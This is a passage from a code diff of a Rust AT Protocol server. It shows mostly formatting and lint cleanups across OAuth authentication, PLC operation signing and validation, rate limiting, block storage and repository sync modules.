auth_header_trimmed.len() >= 5 && auth_header_trimmed[..5].eq_ignore_ascii_case("dpop ") { 228 + } else if auth_header_trimmed.len() >= 5 229 + && auth_header_trimmed[..5].eq_ignore_ascii_case("dpop ") 230 + { 216 231 (auth_header_trimmed[5..].trim(), true) 217 232 } else { 218 233 return Err(OAuthAuthError { ··· 222 237 dpop_nonce: None, 223 238 }); 224 239 }; 225 - let dpop_proof = parts 226 - .headers 227 - .get("DPoP") 228 - .and_then(|v| v.to_str().ok()); 240 + let dpop_proof = parts.headers.get("DPoP").and_then(|v| v.to_str().ok()); 229 241 if let Ok(result) = try_legacy_auth(&state.db, token).await { 230 242 return Ok(OAuthUser { 231 243 did: result.did, ··· 236 248 } 237 249 let http_method = parts.method.as_str(); 238 250 let http_uri = parts.uri.to_string(); 239 - match verify_oauth_access_token(&state.db, token, dpop_proof, http_method, &http_uri).await { 251 + match verify_oauth_access_token(&state.db, token, dpop_proof, http_method, &http_uri).await 252 + { 240 253 Ok(result) => Ok(OAuthUser { 241 254 did: result.did, 242 255 client_id: Some(result.client_id), ··· 259 272 }) 260 273 } 261 274 Err(e) => { 262 - let nonce = if is_dpop_token { Some(generate_dpop_nonce()) } else { None }; 275 + let nonce = if is_dpop_token { 276 + Some(generate_dpop_nonce()) 277 + } else { 278 + None 279 + }; 263 280 Err(OAuthAuthError { 264 281 status: StatusCode::UNAUTHORIZED, 265 282 error: "AuthenticationFailed".to_string(),
+96 -67
src/plc/mod.rs
··· 1 1 use base32::Alphabet; 2 2 use base64::{Engine as _, engine::general_purpose::URL_SAFE_NO_PAD}; 3 - use k256::ecdsa::{SigningKey, Signature, signature::Signer}; 3 + use k256::ecdsa::{Signature, SigningKey, signature::Signer}; 4 4 use reqwest::Client; 5 5 use serde::{Deserialize, Serialize}; 6 - use serde_json::{json, Value}; 6 + use serde_json::{Value, json}; 7 7 use sha2::{Digest, Sha256}; 8 8 use std::collections::HashMap; 9 9 use std::time::Duration; ··· 102 102 .pool_max_idle_per_host(5) 103 103 .build() 104 104 .unwrap_or_else(|_| Client::new()); 105 - Self { 106 - base_url, 107 - client, 108 - } 105 + Self { base_url, client } 109 106 } 110 107 111 108 fn encode_did(did: &str) -> String { ··· 126 123 status, body 127 124 ))); 128 125 } 129 - response.json().await.map_err(|e| PlcError::InvalidResponse(e.to_string())) 126 + response 127 + .json() 128 + .await 129 + .map_err(|e| PlcError::InvalidResponse(e.to_string())) 130 130 } 131 131 132 132 pub async fn get_document_data(&self, did: &str) -> Result<Value, PlcError> { ··· 143 143 status, body 144 144 ))); 145 145 } 146 - response.json().await.map_err(|e| PlcError::InvalidResponse(e.to_string())) 146 + response 147 + .json() 148 + .await 149 + .map_err(|e| PlcError::InvalidResponse(e.to_string())) 147 150 } 148 151 149 152 pub async fn get_last_op(&self, did: &str) -> Result<PlcOpOrTombstone, PlcError> { ··· 160 163 status, body 161 164 ))); 162 165 } 163 - response.json().await.map_err(|e| PlcError::InvalidResponse(e.to_string())) 166 + response 167 + .json() 168 + .await 169 + .map_err(|e| PlcError::InvalidResponse(e.to_string())) 164 170 } 165 171 166 172 pub async fn get_audit_log(&self, did: &str) -> Result<Vec<Value>, PlcError> { ··· 177 183 status, body 178 184 ))); 179 185 } 180 - response.json().await.map_err(|e| PlcError::InvalidResponse(e.to_string())) 186 + response 187 + .json() 188 + .await 189 + .map_err(|e| PlcError::InvalidResponse(e.to_string())) 181 190 } 182 191 183 192 pub async fn send_operation(&self, did: &str, operation: &Value) -> Result<(), PlcError> { 184 193 let url = format!("{}/{}", self.base_url, Self::encode_did(did)); 185 - let response = self.client 186 - .post(&url) 187 - .json(operation) 188 - .send() 189 - .await?; 194 + let response = self.client.post(&url).json(operation).send().await?; 190 195 if !response.status().is_success() { 191 196 let status = response.status(); 192 197 let body = response.text().await.unwrap_or_default(); ··· 200 205 } 201 206 202 207 pub fn cid_for_cbor(value: &Value) -> Result<String, PlcError> { 203 - let cbor_bytes = serde_ipld_dagcbor::to_vec(value) 204 - .map_err(|e| PlcError::Serialization(e.to_string()))?; 208 + let cbor_bytes = 209 + serde_ipld_dagcbor::to_vec(value).map_err(|e| PlcError::Serialization(e.to_string()))?; 205 210 let mut hasher = Sha256::new(); 206 211 hasher.update(&cbor_bytes); 207 212 let hash = hasher.finalize(); ··· 211 216 Ok(cid.to_string()) 212 217 } 213 218 214 - pub fn sign_operation( 215 - operation: &Value, 216 - signing_key: &SigningKey, 217 - ) -> Result<Value, PlcError> { 219 + pub fn sign_operation(operation: &Value, signing_key: &SigningKey) -> Result<Value, PlcError> { 218 220 let mut op = operation.clone(); 219 221 if let Some(obj) = op.as_object_mut() { 220 222 obj.remove("sig"); 221 223 } 222 - let cbor_bytes = serde_ipld_dagcbor::to_vec(&op) 223 - .map_err(|e| PlcError::Serialization(e.to_string()))?; 224 + let cbor_bytes = 225 + serde_ipld_dagcbor::to_vec(&op).map_err(|e| PlcError::Serialization(e.to_string()))?; 224 226 let signature: Signature = signing_key.sign(&cbor_bytes); 225 227 let sig_bytes = signature.to_bytes(); 226 228 let sig_b64 = URL_SAFE_NO_PAD.encode(sig_bytes); ··· 238 240 services: Option<HashMap<String, PlcService>>, 239 241 ) -> Result<Value, PlcError> { 240 242 let prev_value = match last_op { 241 - PlcOpOrTombstone::Operation(op) => serde_json::to_value(op) 242 - .map_err(|e| PlcError::Serialization(e.to_string()))?, 243 - PlcOpOrTombstone::Tombstone(t) => serde_json::to_value(t) 244 - .map_err(|e| PlcError::Serialization(e.to_string()))?, 243 + PlcOpOrTombstone::Operation(op) => { 244 + serde_json::to_value(op).map_err(|e| PlcError::Serialization(e.to_string()))? 245 + } 246 + PlcOpOrTombstone::Tombstone(t) => { 247 + serde_json::to_value(t).map_err(|e| PlcError::Serialization(e.to_string()))? 248 + } 245 249 }; 246 250 let prev_cid = cid_for_cbor(&prev_value)?; 247 251 let (base_rotation_keys, base_verification_methods, base_also_known_as, base_services) = ··· 309 313 prev: None, 310 314 sig: None, 311 315 }; 312 - let genesis_value = serde_json::to_value(&genesis_op) 313 - .map_err(|e| PlcError::Serialization(e.to_string()))?; 316 + let genesis_value = 317 + serde_json::to_value(&genesis_op).map_err(|e| PlcError::Serialization(e.to_string()))?; 314 318 let signed_op = sign_operation(&genesis_value, signing_key)?; 315 319 let did = did_for_genesis_op(&signed_op)?; 316 320 Ok(GenesisResult { ··· 331 335 } 332 336 333 337 pub fn validate_plc_operation(op: &Value) -> Result<(), PlcError> { 334 - let obj = op.as_object() 338 + let obj = op 339 + .as_object() 335 340 .ok_or_else(|| PlcError::InvalidResponse("Operation must be an object".to_string()))?; 336 - let op_type = obj.get("type") 341 + let op_type = obj 342 + .get("type") 337 343 .and_then(|v| v.as_str()) 338 344 .ok_or_else(|| PlcError::InvalidResponse("Missing type field".to_string()))?; 339 345 if op_type != "plc_operation" && op_type != "plc_tombstone" { 340 - return Err(PlcError::InvalidResponse(format!("Invalid type: {}", op_type))); 346 + return Err(PlcError::InvalidResponse(format!( 347 + "Invalid type: {}", 348 + op_type 349 + ))); 341 350 } 342 351 if op_type == "plc_operation" { 343 352 if obj.get("rotationKeys").is_none() { 344 - return Err(PlcError::InvalidResponse("Missing rotationKeys".to_string())); 353 + return Err(PlcError::InvalidResponse( 354 + "Missing rotationKeys".to_string(), 355 + )); 345 356 } 346 357 if obj.get("verificationMethods").is_none() { 347 - return Err(PlcError::InvalidResponse("Missing verificationMethods".to_string())); 358 + return Err(PlcError::InvalidResponse( 359 + "Missing verificationMethods".to_string(), 360 + )); 348 361 } 349 362 if obj.get("alsoKnownAs").is_none() { 350 363 return Err(PlcError::InvalidResponse("Missing alsoKnownAs".to_string())); ··· 371 384 ctx: &PlcValidationContext, 372 385 ) -> Result<(), PlcError> { 373 386 validate_plc_operation(op)?; 374 - let obj = op.as_object() 387 + let obj = op 388 + .as_object() 375 389 .ok_or_else(|| PlcError::InvalidResponse("Operation must be an object".to_string()))?; 376 - let op_type = obj.get("type") 377 - .and_then(|v| v.as_str()) 378 - .unwrap_or(""); 390 + let op_type = obj.get("type").and_then(|v| v.as_str()).unwrap_or(""); 379 391 if op_type != "plc_operation" { 380 392 return Ok(()); 381 393 } 382 - let rotation_keys = obj.get("rotationKeys") 394 + let rotation_keys = obj 395 + .get("rotationKeys") 383 396 .and_then(|v| v.as_array()) 384 397 .ok_or_else(|| PlcError::InvalidResponse("rotationKeys must be an array".to_string()))?; 385 - let rotation_key_strings: Vec<&str> = rotation_keys 386 - .iter() 387 - .filter_map(|v| v.as_str()) 388 - .collect(); 398 + let rotation_key_strings: Vec<&str> = rotation_keys.iter().filter_map(|v| v.as_str()).collect(); 389 399 if !rotation_key_strings.contains(&ctx.server_rotation_key.as_str()) { 390 400 return Err(PlcError::InvalidResponse( 391 - "Rotation keys do not include server's rotation key".to_string() 401 + "Rotation keys do not include server's rotation key".to_string(), 392 402 )); 393 403 } 394 - let verification_methods = obj.get("verificationMethods") 404 + let verification_methods = obj 405 + .get("verificationMethods") 395 406 .and_then(|v| v.as_object()) 396 - .ok_or_else(|| PlcError::InvalidResponse("verificationMethods must be an object".to_string()))?; 397 - if let Some(atproto_key) = verification_methods.get("atproto").and_then(|v| v.as_str()) { 398 - if atproto_key != ctx.expected_signing_key { 399 - return Err(PlcError::InvalidResponse("Incorrect signing key".to_string())); 407 + .ok_or_else(|| { 408 + PlcError::InvalidResponse("verificationMethods must be an object".to_string()) 409 + })?; 410 + if let Some(atproto_key) = verification_methods.get("atproto").and_then(|v| v.as_str()) 411 + && atproto_key != ctx.expected_signing_key { 412 + return Err(PlcError::InvalidResponse( 413 + "Incorrect signing key".to_string(), 414 + )); 400 415 } 401 - } 402 - let also_known_as = obj.get("alsoKnownAs") 416 + let also_known_as = obj 417 + .get("alsoKnownAs") 403 418 .and_then(|v| v.as_array()) 404 419 .ok_or_else(|| PlcError::InvalidResponse("alsoKnownAs must be an array".to_string()))?; 405 420 let expected_handle_uri = format!("at://{}", ctx.expected_handle); ··· 409 424 .any(|s| s == expected_handle_uri); 410 425 if !has_correct_handle && !also_known_as.is_empty() { 411 426 return Err(PlcError::InvalidResponse( 412 - "Incorrect handle in alsoKnownAs".to_string() 427 + "Incorrect handle in alsoKnownAs".to_string(), 413 428 )); 414 429 } 415 - let services = obj.get("services") 430 + let services = obj 431 + .get("services") 416 432 .and_then(|v| v.as_object()) 417 433 .ok_or_else(|| PlcError::InvalidResponse("services must be an object".to_string()))?; 418 434 if let Some(pds_service) = services.get("atproto_pds").and_then(|v| v.as_object()) { 419 - let service_type = pds_service.get("type").and_then(|v| v.as_str()).unwrap_or(""); 435 + let service_type = pds_service 436 + .get("type") 437 + .and_then(|v| v.as_str()) 438 + .unwrap_or(""); 420 439 if service_type != "AtprotoPersonalDataServer" { 421 440 return Err(PlcError::InvalidResponse( 422 - "Incorrect type on atproto_pds service".to_string() 441 + "Incorrect type on atproto_pds service".to_string(), 423 442 )); 424 443 } 425 - let endpoint = pds_service.get("endpoint").and_then(|v| v.as_str()).unwrap_or(""); 444 + let endpoint = pds_service 445 + .get("endpoint") 446 + .and_then(|v| v.as_str()) 447 + .unwrap_or(""); 426 448 if endpoint != ctx.expected_pds_endpoint { 427 449 return Err(PlcError::InvalidResponse( 428 - "Incorrect endpoint on atproto_pds service".to_string() 450 + "Incorrect endpoint on atproto_pds service".to_string(), 429 451 )); 430 452 } 431 453 } 432 454 Ok(()) 433 455 } 434 456 435 - pub fn verify_operation_signature( 436 - op: &Value, 437 - rotation_keys: &[String], 438 - ) -> Result<bool, PlcError> { 439 - let obj = op.as_object() 457 + pub fn verify_operation_signature(op: &Value, rotation_keys: &[String]) -> Result<bool, PlcError> { 458 + let obj = op 459 + .as_object() 440 460 .ok_or_else(|| PlcError::InvalidResponse("Operation must be an object".to_string()))?; 441 - let sig_b64 = obj.get("sig") 461 + let sig_b64 = obj 462 + .get("sig") 442 463 .and_then(|v| v.as_str()) 443 464 .ok_or_else(|| PlcError::InvalidResponse("Missing sig".to_string()))?; 444 465 let sig_bytes = URL_SAFE_NO_PAD ··· 467 488 ) -> Result<bool, PlcError> { 468 489 use k256::ecdsa::{VerifyingKey, signature::Verifier}; 469 490 if !did_key.starts_with("did:key:z") { 470 - return Err(PlcError::InvalidResponse("Invalid did:key format".to_string())); 491 + return Err(PlcError::InvalidResponse( 492 + "Invalid did:key format".to_string(), 493 + )); 471 494 } 472 495 let multibase_part = &did_key[8..]; 473 496 let (_, decoded) = multibase::decode(multibase_part) 474 497 .map_err(|e| PlcError::InvalidResponse(format!("Failed to decode did:key: {}", e)))?; 475 498 if decoded.len() < 2 { 476 - return Err(PlcError::InvalidResponse("Invalid did:key data".to_string())); 499 + return Err(PlcError::InvalidResponse( 500 + "Invalid did:key data".to_string(), 501 + )); 477 502 } 478 503 let (codec, key_bytes) = if decoded[0] == 0xe7 && decoded[1] == 0x01 { 479 504 (0xe701u16, &decoded[2..]) 480 505 } else { 481 - return Err(PlcError::InvalidResponse("Unsupported key type in did:key".to_string())); 506 + return Err(PlcError::InvalidResponse( 507 + "Unsupported key type in did:key".to_string(), 508 + )); 482 509 }; 483 510 if codec != 0xe701 { 484 - return Err(PlcError::InvalidResponse("Only secp256k1 keys are supported".to_string())); 511 + return Err(PlcError::InvalidResponse( 512 + "Only secp256k1 keys are supported".to_string(), 513 + )); 485 514 } 486 515 let verifying_key = VerifyingKey::from_sec1_bytes(key_bytes) 487 516 .map_err(|e| PlcError::InvalidResponse(format!("Invalid public key: {}", e)))?;
+60 -66
src/rate_limit.rs
··· 1 1 use axum::{ 2 + Json, 2 3 body::Body, 3 4 extract::ConnectInfo, 4 5 http::{HeaderMap, Request, StatusCode}, 5 6 middleware::Next, 6 7 response::{IntoResponse, Response}, 7 - Json, 8 8 }; 9 9 use governor::{ 10 10 Quota, RateLimiter, 11 11 clock::DefaultClock, 12 12 state::{InMemoryState, NotKeyed, keyed::DefaultKeyedStateStore}, 13 13 }; 14 - use std::{ 15 - net::SocketAddr, 16 - num::NonZeroU32, 17 - sync::Arc, 18 - }; 14 + use std::{net::SocketAddr, num::NonZeroU32, sync::Arc}; 19 15 20 16 pub type KeyedRateLimiter = RateLimiter<String, DefaultKeyedStateStore<String>, DefaultClock>; 21 17 pub type GlobalRateLimiter = RateLimiter<NotKeyed, InMemoryState, DefaultClock>; ··· 44 40 impl RateLimiters { 45 41 pub fn new() -> Self { 46 42 Self { 47 - login: Arc::new(RateLimiter::keyed( 48 - Quota::per_minute(NonZeroU32::new(10).unwrap()) 49 - )), 50 - oauth_token: Arc::new(RateLimiter::keyed( 51 - Quota::per_minute(NonZeroU32::new(30).unwrap()) 52 - )), 53 - oauth_authorize: Arc::new(RateLimiter::keyed( 54 - Quota::per_minute(NonZeroU32::new(10).unwrap()) 55 - )), 56 - password_reset: Arc::new(RateLimiter::keyed( 57 - Quota::per_hour(NonZeroU32::new(5).unwrap()) 58 - )), 59 - account_creation: Arc::new(RateLimiter::keyed( 60 - Quota::per_hour(NonZeroU32::new(10).unwrap()) 61 - )), 62 - refresh_session: Arc::new(RateLimiter::keyed( 63 - Quota::per_minute(NonZeroU32::new(60).unwrap()) 64 - )), 65 - reset_password: Arc::new(RateLimiter::keyed( 66 - Quota::per_minute(NonZeroU32::new(10).unwrap()) 67 - )), 68 - oauth_par: Arc::new(RateLimiter::keyed( 69 - Quota::per_minute(NonZeroU32::new(30).unwrap()) 70 - )), 71 - oauth_introspect: Arc::new(RateLimiter::keyed( 72 - Quota::per_minute(NonZeroU32::new(30).unwrap()) 73 - )), 74 - app_password: Arc::new(RateLimiter::keyed( 75 - Quota::per_minute(NonZeroU32::new(10).unwrap()) 76 - )), 77 - email_update: Arc::new(RateLimiter::keyed( 78 - Quota::per_hour(NonZeroU32::new(5).unwrap()) 79 - )), 43 + login: Arc::new(RateLimiter::keyed(Quota::per_minute( 44 + NonZeroU32::new(10).unwrap(), 45 + ))), 46 + oauth_token: Arc::new(RateLimiter::keyed(Quota::per_minute( 47 + NonZeroU32::new(30).unwrap(), 48 + ))), 49 + oauth_authorize: Arc::new(RateLimiter::keyed(Quota::per_minute( 50 + NonZeroU32::new(10).unwrap(), 51 + ))), 52 + password_reset: Arc::new(RateLimiter::keyed(Quota::per_hour( 53 + NonZeroU32::new(5).unwrap(), 54 + ))), 55 + account_creation: Arc::new(RateLimiter::keyed(Quota::per_hour( 56 + NonZeroU32::new(10).unwrap(), 57 + ))), 58 + refresh_session: Arc::new(RateLimiter::keyed(Quota::per_minute( 59 + NonZeroU32::new(60).unwrap(), 60 + ))), 61 + reset_password: Arc::new(RateLimiter::keyed(Quota::per_minute( 62 + NonZeroU32::new(10).unwrap(), 63 + ))), 64 + oauth_par: Arc::new(RateLimiter::keyed(Quota::per_minute( 65 + NonZeroU32::new(30).unwrap(), 66 + ))), 67 + oauth_introspect: Arc::new(RateLimiter::keyed(Quota::per_minute( 68 + NonZeroU32::new(30).unwrap(), 69 + ))), 70 + app_password: Arc::new(RateLimiter::keyed(Quota::per_minute( 71 + NonZeroU32::new(10).unwrap(), 72 + ))), 73 + email_update: Arc::new(RateLimiter::keyed(Quota::per_hour( 74 + NonZeroU32::new(5).unwrap(), 75 + ))), 80 76 } 81 77 } 82 78 83 79 pub fn with_login_limit(mut self, per_minute: u32) -> Self { 84 - self.login = Arc::new(RateLimiter::keyed( 85 - Quota::per_minute(NonZeroU32::new(per_minute).unwrap_or(NonZeroU32::new(10).unwrap())) 86 - )); 80 + self.login = Arc::new(RateLimiter::keyed(Quota::per_minute( 81 + NonZeroU32::new(per_minute).unwrap_or(NonZeroU32::new(10).unwrap()), 82 + ))); 87 83 self 88 84 } 89 85 90 86 pub fn with_oauth_token_limit(mut self, per_minute: u32) -> Self { 91 - self.oauth_token = Arc::new(RateLimiter::keyed( 92 - Quota::per_minute(NonZeroU32::new(per_minute).unwrap_or(NonZeroU32::new(30).unwrap())) 93 - )); 87 + self.oauth_token = Arc::new(RateLimiter::keyed(Quota::per_minute( 88 + NonZeroU32::new(per_minute).unwrap_or(NonZeroU32::new(30).unwrap()), 89 + ))); 94 90 self 95 91 } 96 92 97 93 pub fn with_oauth_authorize_limit(mut self, per_minute: u32) -> Self { 98 - self.oauth_authorize = Arc::new(RateLimiter::keyed( 99 - Quota::per_minute(NonZeroU32::new(per_minute).unwrap_or(NonZeroU32::new(10).unwrap())) 100 - )); 94 + self.oauth_authorize = Arc::new(RateLimiter::keyed(Quota::per_minute( 95 + NonZeroU32::new(per_minute).unwrap_or(NonZeroU32::new(10).unwrap()), 96 + ))); 101 97 self 102 98 } 103 99 104 100 pub fn with_password_reset_limit(mut self, per_hour: u32) -> Self { 105 - self.password_reset = Arc::new(RateLimiter::keyed( 106 - Quota::per_hour(NonZeroU32::new(per_hour).unwrap_or(NonZeroU32::new(5).unwrap())) 107 - )); 101 + self.password_reset = Arc::new(RateLimiter::keyed(Quota::per_hour( 102 + NonZeroU32::new(per_hour).unwrap_or(NonZeroU32::new(5).unwrap()), 103 + ))); 108 104 self 109 105 } 110 106 111 107 pub fn with_account_creation_limit(mut self, per_hour: u32) -> Self { 112 - self.account_creation = Arc::new(RateLimiter::keyed( 113 - Quota::per_hour(NonZeroU32::new(per_hour).unwrap_or(NonZeroU32::new(10).unwrap())) 114 - )); 108 + self.account_creation = Arc::new(RateLimiter::keyed(Quota::per_hour( 109 + NonZeroU32::new(per_hour).unwrap_or(NonZeroU32::new(10).unwrap()), 110 + ))); 115 111 self 116 112 } 117 113 118 114 pub fn with_email_update_limit(mut self, per_hour: u32) -> Self { 119 - self.email_update = Arc::new(RateLimiter::keyed( 120 - Quota::per_hour(NonZeroU32::new(per_hour).unwrap_or(NonZeroU32::new(5).unwrap())) 121 - )); 115 + self.email_update = Arc::new(RateLimiter::keyed(Quota::per_hour( 116 + NonZeroU32::new(per_hour).unwrap_or(NonZeroU32::new(5).unwrap()), 117 + ))); 122 118 self 123 119 } 124 120 } 125 121 126 122 pub fn extract_client_ip(headers: &HeaderMap, addr: Option<SocketAddr>) -> String { 127 - if let Some(forwarded) = headers.get("x-forwarded-for") { 128 - if let Ok(value) = forwarded.to_str() { 129 - if let Some(first_ip) = value.split(',').next() { 123 + if let Some(forwarded) = headers.get("x-forwarded-for") 124 + && let Ok(value) = forwarded.to_str() 125 + && let Some(first_ip) = value.split(',').next() { 130 126 return first_ip.trim().to_string(); 131 127 } 132 - } 133 - } 134 128 135 - if let Some(real_ip) = headers.get("x-real-ip") { 136 - if let Ok(value) = real_ip.to_str() { 129 + if let Some(real_ip) = headers.get("x-real-ip") 130 + && let Ok(value) = real_ip.to_str() { 137 131 return value.trim().to_string(); 138 132 } 139 - } 140 133 141 - addr.map(|a| a.ip().to_string()).unwrap_or_else(|| "unknown".to_string()) 134 + addr.map(|a| a.ip().to_string()) 135 + .unwrap_or_else(|| "unknown".to_string()) 142 136 } 143 137 144 138 fn rate_limit_response() -> Response {
+18 -10
src/repo/mod.rs
··· 27 27 let row = sqlx::query!("SELECT data FROM blocks WHERE cid = $1", &cid_bytes) 28 28 .fetch_optional(&self.pool) 29 29 .await 30 - .map_err(|e| RepoError::storage(e))?; 30 + .map_err(RepoError::storage)?; 31 31 match row { 32 32 Some(row) => Ok(Some(Bytes::from(row.data))), 33 33 None => Ok(None), ··· 39 39 let mut hasher = Sha256::new(); 40 40 hasher.update(data); 41 41 let hash = hasher.finalize(); 42 - let multihash = Multihash::wrap(0x12, &hash) 43 - .map_err(|e| RepoError::storage(std::io::Error::new(std::io::ErrorKind::InvalidData, format!("Failed to wrap multihash: {:?}", e))))?; 42 + let multihash = Multihash::wrap(0x12, &hash).map_err(|e| { 43 + RepoError::storage(std::io::Error::new( 44 + std::io::ErrorKind::InvalidData, 45 + format!("Failed to wrap multihash: {:?}", e), 46 + )) 47 + })?; 44 48 let cid = Cid::new_v1(0x71, multihash); 45 49 let cid_bytes = cid.to_bytes(); 46 - sqlx::query!("INSERT INTO blocks (cid, data) VALUES ($1, $2) ON CONFLICT (cid) DO NOTHING", &cid_bytes, data) 47 - .execute(&self.pool) 48 - .await 49 - .map_err(|e| RepoError::storage(e))?; 50 + sqlx::query!( 51 + "INSERT INTO blocks (cid, data) VALUES ($1, $2) ON CONFLICT (cid) DO NOTHING", 52 + &cid_bytes, 53 + data 54 + ) 55 + .execute(&self.pool) 56 + .await 57 + .map_err(RepoError::storage)?; 50 58 Ok(cid) 51 59 } 52 60 ··· 56 64 let row = sqlx::query!("SELECT 1 as one FROM blocks WHERE cid = $1", &cid_bytes) 57 65 .fetch_optional(&self.pool) 58 66 .await 59 - .map_err(|e| RepoError::storage(e))?; 67 + .map_err(RepoError::storage)?; 60 68 Ok(row.is_some()) 61 69 } 62 70 ··· 82 90 ) 83 91 .execute(&self.pool) 84 92 .await 85 - .map_err(|e| RepoError::storage(e))?; 93 + .map_err(RepoError::storage)?; 86 94 Ok(()) 87 95 } 88 96 ··· 98 106 ) 99 107 .fetch_all(&self.pool) 100 108 .await 101 - .map_err(|e| RepoError::storage(e))?; 109 + .map_err(RepoError::storage)?; 102 110 let found: std::collections::HashMap<Vec<u8>, Bytes> = rows 103 111 .into_iter() 104 112 .map(|row| (row.cid, Bytes::from(row.data)))
+15 -7
src/repo/tracking.rs
··· 51 51 let result = self.inner.get(cid).await?; 52 52 if result.is_some() { 53 53 match self.read_cids.lock() { 54 - Ok(mut guard) => { guard.insert(*cid); }, 55 - Err(poisoned) => { poisoned.into_inner().insert(*cid); }, 54 + Ok(mut guard) => { 55 + guard.insert(*cid); 56 + } 57 + Err(poisoned) => { 58 + poisoned.into_inner().insert(*cid); 59 + } 56 60 } 57 61 } 58 62 Ok(result) ··· 61 65 async fn put(&self, data: &[u8]) -> Result<Cid, RepoError> { 62 66 let cid = self.inner.put(data).await?; 63 67 match self.written_cids.lock() { 64 - Ok(mut guard) => guard.push(cid.clone()), 65 - Err(poisoned) => poisoned.into_inner().push(cid.clone()), 68 + Ok(mut guard) => guard.push(cid), 69 + Err(poisoned) => poisoned.into_inner().push(cid), 66 70 } 67 71 Ok(cid) 68 72 } ··· 76 80 blocks: impl IntoIterator<Item = (Cid, Bytes)> + Send, 77 81 ) -> Result<(), RepoError> { 78 82 let blocks: Vec<_> = blocks.into_iter().collect(); 79 - let cids: Vec<Cid> = blocks.iter().map(|(cid, _)| cid.clone()).collect(); 83 + let cids: Vec<Cid> = blocks.iter().map(|(cid, _)| *cid).collect(); 80 84 self.inner.put_many(blocks).await?; 81 85 match self.written_cids.lock() { 82 86 Ok(mut guard) => guard.extend(cids), ··· 90 94 for (cid, result) in cids.iter().zip(results.iter()) { 91 95 if result.is_some() { 92 96 match self.read_cids.lock() { 93 - Ok(mut guard) => { guard.insert(*cid); }, 94 - Err(poisoned) => { poisoned.into_inner().insert(*cid); }, 97 + Ok(mut guard) => { 98 + guard.insert(*cid); 99 + } 100 + Err(poisoned) => { 101 + poisoned.into_inner().insert(*cid); 102 + } 95 103 } 96 104 } 97 105 }
+5 -1
src/state.rs
··· 117 117 let limiter_name = kind.key_prefix(); 118 118 let (limit, window_ms) = kind.limit_and_window_ms(); 119 119 120 - if !self.distributed_rate_limiter.check_rate_limit(&key, limit, window_ms).await { 120 + if !self 121 + .distributed_rate_limiter 122 + .check_rate_limit(&key, limit, window_ms) 123 + .await 124 + { 121 125 crate::metrics::record_rate_limit_rejection(limiter_name); 122 126 return false; 123 127 }
+4 -2
src/storage/mod.rs
··· 62 62 } 63 63 64 64 async fn put_bytes(&self, key: &str, data: Bytes) -> Result<(), StorageError> { 65 - let result = self.client 65 + let result = self 66 + .client 66 67 .put_object() 67 68 .bucket(&self.bucket) 68 69 .key(key) ··· 112 113 } 113 114 114 115 async fn delete(&self, key: &str) -> Result<(), StorageError> { 115 - let result = self.client 116 + let result = self 117 + .client 116 118 .delete_object() 117 119 .bucket(&self.bucket) 118 120 .key(key)
+9 -13
src/sync/blob.rs
··· 58 58 } 59 59 Ok(Some(_)) => {} 60 60 } 61 - let blob_result = sqlx::query!("SELECT storage_key, mime_type FROM blobs WHERE cid = $1", cid) 62 - .fetch_optional(&state.db) 63 - .await; 61 + let blob_result = sqlx::query!( 62 + "SELECT storage_key, mime_type FROM blobs WHERE cid = $1", 63 + cid 64 + ) 65 + .fetch_optional(&state.db) 66 + .await; 64 67 match blob_result { 65 68 Ok(Some(row)) => { 66 69 let storage_key = &row.storage_key; 67 70 let mime_type = &row.mime_type; 68 - match state.blob_store.get(&storage_key).await { 71 + match state.blob_store.get(storage_key).await { 69 72 Ok(data) => Response::builder() 70 73 .status(StatusCode::OK) 71 74 .header(header::CONTENT_TYPE, mime_type) ··· 184 187 match cids_result { 185 188 Ok(cids) => { 186 189 let has_more = cids.len() as i64 > limit; 187 - let cids: Vec<String> = cids 188 - .into_iter() 189 - .take(limit as usize) 190 - .collect(); 191 - let next_cursor = if has_more { 192 - cids.last().cloned() 193 - } else { 194 - None 195 - }; 190 + let cids: Vec<String> = cids.into_iter().take(limit as usize).collect(); 191 + let next_cursor = if has_more { cids.last().cloned() } else { None }; 196 192 ( 197 193 StatusCode::OK, 198 194 Json(ListBlobsOutput {
+4 -2
src/sync/car.rs
··· 24 24 } 25 25 26 26 pub fn encode_car_header(root_cid: &Cid) -> Result<Vec<u8>, String> { 27 - let header = CarHeader::new_v1(vec![root_cid.clone()]); 28 - let header_cbor = header.encode().map_err(|e| format!("Failed to encode CAR header: {:?}", e))?; 27 + let header = CarHeader::new_v1(vec![*root_cid]); 28 + let header_cbor = header 29 + .encode() 30 + .map_err(|e| format!("Failed to encode CAR header: {:?}", e))?; 29 31 let mut result = Vec::new(); 30 32 write_varint(&mut result, header_cbor.len() as u64) 31 33 .expect("Writing to Vec<u8> should never fail");
+4 -2
src/sync/commit.rs
··· 56 56 .await; 57 57 match result { 58 58 Ok(Some(row)) => { 59 - let rev = get_rev_from_commit(&state, &row.repo_root_cid).await 59 + let rev = get_rev_from_commit(&state, &row.repo_root_cid) 60 + .await 60 61 .unwrap_or_else(|| chrono::Utc::now().timestamp_millis().to_string()); 61 62 ( 62 63 StatusCode::OK, ··· 129 130 let has_more = rows.len() as i64 > limit; 130 131 let mut repos: Vec<RepoInfo> = Vec::new(); 131 132 for row in rows.iter().take(limit as usize) { 132 - let rev = get_rev_from_commit(&state, &row.repo_root_cid).await 133 + let rev = get_rev_from_commit(&state, &row.repo_root_cid) 134 + .await 133 135 .unwrap_or_else(|| chrono::Utc::now().timestamp_millis().to_string()); 134 136 repos.push(RepoInfo { 135 137 did: row.did.clone(),
+11 -3
src/sync/deprecated.rs
··· 51 51 .fetch_optional(&state.db) 52 52 .await; 53 53 match result { 54 - Ok(Some(row)) => (StatusCode::OK, Json(GetHeadOutput { root: row.repo_root_cid })).into_response(), 54 + Ok(Some(row)) => ( 55 + StatusCode::OK, 56 + Json(GetHeadOutput { 57 + root: row.repo_root_cid, 58 + }), 59 + ) 60 + .into_response(), 55 61 Ok(None) => ( 56 62 StatusCode::BAD_REQUEST, 57 63 Json(json!({"error": "HeadNotFound", "message": "Could not find root for DID"})), ··· 157 163 let mut writer = Vec::new(); 158 164 crate::sync::car::write_varint(&mut writer, total_len as u64) 159 165 .expect("Writing to Vec<u8> should never fail"); 160 - writer.write_all(&cid_bytes) 166 + writer 167 + .write_all(&cid_bytes) 161 168 .expect("Writing to Vec<u8> should never fail"); 162 - writer.write_all(&block) 169 + writer 170 + .write_all(&block) 163 171 .expect("Writing to Vec<u8> should never fail"); 164 172 car_bytes.extend_from_slice(&writer); 165 173 if let Ok(value) = serde_ipld_dagcbor::from_slice::<Ipld>(&block) {
+1 -1
src/sync/firehose.rs
